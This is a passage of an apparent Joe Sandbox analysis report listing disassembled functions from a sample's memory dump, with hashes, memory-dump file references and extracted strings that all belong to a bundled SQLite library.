                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %s: table does not support scanning$ASC$DESC$SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %s$bm25$parse error in rank function: %s
                                                                                                                                                                                                                  • API String ID: 0-3769240353
                                                                                                                                                                                                                  • Opcode ID: 86886f31679b2caff8dc156906319768d1a7e62eeaee29089c1e65294a0d6b8f
                                                                                                                                                                                                                  • Instruction ID: be6b2d50e9e97fff6a13f0e38aef9311faf0abf9405c4e84d08de445bee4a2c0
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86886f31679b2caff8dc156906319768d1a7e62eeaee29089c1e65294a0d6b8f
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6652B072B48B5282E775ABB595E03B923A4FB46B84F04823ADE5D47B96DF3CE451C300
                                                                                                                                                                                                                  Function 00007FFD94480CB0 Relevance: 8.0, Strings: 6, Instructions: 482COMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: main$schema$sqlite_$sqlite_master$sqlite_temp_master$temp_schema
                                                                                                                                                                                                                  • API String ID: 0-3006123741
                                                                                                                                                                                                                  • Opcode ID: 45451b457856cb692d4c14e0e0eed5058c2b8cd0ec89236d97c202284514b5da
                                                                                                                                                                                                                  • Instruction ID: 3afa9179bb60c002a4887cdf8c3536cc474663d1f9ab17f8ef085d190475f2d9
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45451b457856cb692d4c14e0e0eed5058c2b8cd0ec89236d97c202284514b5da
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52120562B0899681E7F54BA680B067C7BA2EB43B85F55C137DE9E4738BCA7CD845C700
                                                                                                                                                                                                                  Function 00007FFD944F1210 Relevance: 7.9, Strings: 6, Instructions: 420COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                                  • API String ID: 0-463513059
                                                                                                                                                                                                                  • Opcode ID: e69649e3b2d1fb556b712b41518bbec7297b5ac68d350c4718e9be10159b396a
                                                                                                                                                                                                                  • Instruction ID: 0abbb73523c82658ef3749347157918be9bfdabf999b98ee4b69ff9083ae7354
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e69649e3b2d1fb556b712b41518bbec7297b5ac68d350c4718e9be10159b396a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76F11451B1C7C607EB6D8BB969A11786BA0AB57780F14C13ADEAE47793DE2CB911C300
                                                                                                                                                                                                                  Function 00007FFD9440D380 Relevance: 7.0, Strings: 5, Instructions: 763COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                                  • API String ID: 0-3582982771
                                                                                                                                                                                                                  • Opcode ID: 28510e67adb35eaee2db1fb187dabaf954bb835956af476dc30e4c05e9493ddd
                                                                                                                                                                                                                  • Instruction ID: 2e9b46d683ff1c117c78dda8c2491396fa72a6c7db6a494f2bfb4cef9807039d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28510e67adb35eaee2db1fb187dabaf954bb835956af476dc30e4c05e9493ddd
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B727FA1B29A4285EBB59FD5D8E037923A0FF46B84F048135CA5E4779ADF7CE469C300
                                                                                                                                                                                                                  Function 00007FFD9440C100 Relevance: 6.9, Strings: 5, Instructions: 646COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                                  • API String ID: 0-3582982771
                                                                                                                                                                                                                  • Opcode ID: 1b3996caacf4a2312daa13beee652dc50d737970d299b47f4be9e6e8c5a389a4
                                                                                                                                                                                                                  • Instruction ID: e41006e1d9cf85d035c94b9fd7d8b86dfe5adf87f57c28fa3f7e7db2c1633986
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b3996caacf4a2312daa13beee652dc50d737970d299b47f4be9e6e8c5a389a4
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5528B21B49A42C5EBB8AFE5D4F43B92391EF46B84F049535CA4E4B69BDEBCE451C300
                                                                                                                                                                                                                  Function 00007FFD9440A7A0 Relevance: 6.9, Strings: 5, Instructions: 631COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %d %d %d %d $fts3cursor$illegal first argument to %s$offsets$p
                                                                                                                                                                                                                  • API String ID: 0-1954512986
                                                                                                                                                                                                                  • Opcode ID: a87b530abb4035f66b0b639ccb86e4a71594fcc4dabf6b7cad9b4289256e58be
                                                                                                                                                                                                                  • Instruction ID: d097d1bf55f12f7b4c56d99552dbbd260165d83c1ba0e665234a39eb95feea03
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a87b530abb4035f66b0b639ccb86e4a71594fcc4dabf6b7cad9b4289256e58be
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C526E31B18B5686EFA59FD5E8A027963A0FB8AB94F008135DE4D4776ADF7CE844C700
                                                                                                                                                                                                                  Function 00007FFD94418570 Relevance: 5.9, Strings: 4, Instructions: 888COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$block$misuse
                                                                                                                                                                                                                  • API String ID: 0-2158970013
                                                                                                                                                                                                                  • Opcode ID: 91de08d8a7207063170d8216082a64d9d8d23b4499efdc2084f02604556023da
                                                                                                                                                                                                                  • Instruction ID: 71d18aa880d1297e5857512ac809d0d545c5a6a5e7548413bfbcc84ddfc4a832
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91de08d8a7207063170d8216082a64d9d8d23b4499efdc2084f02604556023da
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE924821B09B4686EBB58FD5E8E427967A0FF5AB80F058035DA4E47766DF7CE844C301
                                                                                                                                                                                                                  Function 00007FFD944E1540 Relevance: 5.6, Strings: 4, Instructions: 626COMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %.4c%s%.16c$-mj%06X9%02X$MJ collide: %s$MJ delete: %s
                                                                                                                                                                                                                  • API String ID: 0-4294478755
                                                                                                                                                                                                                  • Opcode ID: b3fc16a77d60ef0b2d62892fbb68617719b85cf2c8c41d0be31f83e68d19e67d
                                                                                                                                                                                                                  • Instruction ID: 08764287374ef3dba398390ca7df1f8a4587b22c95bf09aec6a7f8b6e452b317
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3fc16a77d60ef0b2d62892fbb68617719b85cf2c8c41d0be31f83e68d19e67d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD525E22B49A4681EB759FA594E427B23A0FF46F94F198535CE5E0739ADF7CE881C300
                                                                                                                                                                                                                  Function 00007FFD9443C220 Relevance: 5.5, Strings: 4, Instructions: 503COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: RECURSIVE STEP$SETUP$cannot use window functions in recursive queries$recursive aggregate queries not supported
                                                                                                                                                                                                                  • API String ID: 0-4261064685
                                                                                                                                                                                                                  • Opcode ID: 1ae00f54c2452060a6cdd9e895e7311e021842b58eef6f0d4b619e42330bc467
                                                                                                                                                                                                                  • Instruction ID: 872917fcfc0eb8099f00ac5e4905888b9550450ccfbc69a787d39ab7f05e48f4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ae00f54c2452060a6cdd9e895e7311e021842b58eef6f0d4b619e42330bc467
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82327C73A04A858AE720DF65D5A0BAD7BA0F785F88F55C236CA8E4775ADF78D011CB00
                                                                                                                                                                                                                  Function 00007FFD943D5323 Relevance: 5.4, Strings: 4, Instructions: 437COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
                                                                                                                                                                                                                  • API String ID: 0-2031831958
                                                                                                                                                                                                                  • Opcode ID: a68307dc4e82d48ed4c4f534f25c81175225768a23f26091d5da3ec9881dd088
                                                                                                                                                                                                                  • Instruction ID: 315229a4058cc92dc23b9e8c27f9de25da07870a36d3b73f2d19c86e88e84b2a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a68307dc4e82d48ed4c4f534f25c81175225768a23f26091d5da3ec9881dd088
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B022422B4D68282EB79DBA594E477D7BE1FB46784F098239DA4D43752DE3EE400C700
                                                                                                                                                                                                                  Function 00007FFD943E0210 Relevance: 5.2, Strings: 3, Instructions: 1419COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                                                  • API String ID: 0-4001610065
                                                                                                                                                                                                                  • Opcode ID: 587790c04705c336b0da028d4f799647ffc3893eac96114cd5bcf19acb8bef33
                                                                                                                                                                                                                  • Instruction ID: e599b12fd43f5aab0eb2fc2e82dbc0d815a2e198c821986ae8f965e0bef20cfc
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 587790c04705c336b0da028d4f799647ffc3893eac96114cd5bcf19acb8bef33
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84E2A132B196918BEB60DFA5D4906AF77B1FB45B88F108139EA4E53B59DF38E441CB00
                                                                                                                                                                                                                  Function 00007FFD943DDCD0 Relevance: 4.8, Strings: 3, Instructions: 1036COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: BBB$f$sqlite\_%
                                                                                                                                                                                                                  • API String ID: 0-4099593418
                                                                                                                                                                                                                  • Opcode ID: 68a401ec1bd33c25321d604c19b858e599c8929007dbbf3befc69ff6b5cffcc6
                                                                                                                                                                                                                  • Instruction ID: 90978738d0f4b4f0e25d48a928ddc7ca22de282bd2fe913017a62fac7dff3a2d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68a401ec1bd33c25321d604c19b858e599c8929007dbbf3befc69ff6b5cffcc6
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EB28972608A858ADB60EF55E490BAD7BA0F789F84F52C239DB8E43759DF39D444CB00
                                                                                                                                                                                                                  Function 00007FFD944724B0 Relevance: 4.5, Strings: 3, Instructions: 778COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                                                                  • API String ID: 0-2903559916
                                                                                                                                                                                                                  • Opcode ID: cbf69b7f54af56c66d64644f0716314616360d3e06477d0f03effbda181f76be
                                                                                                                                                                                                                  • Instruction ID: 65d62674334fc3c719039a060f51d5838b80c5a9428df9d3f639bbf97bd03a62
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbf69b7f54af56c66d64644f0716314616360d3e06477d0f03effbda181f76be
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D728031B0AA9685EBB58FD5A4E027967A1FF46B80F09C135DA4D4739ADF7CE846C300
                                                                                                                                                                                                                  Function 00007FFD9443B660 Relevance: 4.5, Strings: 3, Instructions: 715COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: LAST TERM OF $USE TEMP B-TREE FOR %sORDER BY$USE TEMP B-TREE FOR LAST %d TERMS OF ORDER BY
                                                                                                                                                                                                                  • API String ID: 0-13984226
                                                                                                                                                                                                                  • Opcode ID: 8fe7376a9f3cbe8ba2ff67ed1f805d9e0ad474f09f004b43e5cd3b66e7842909
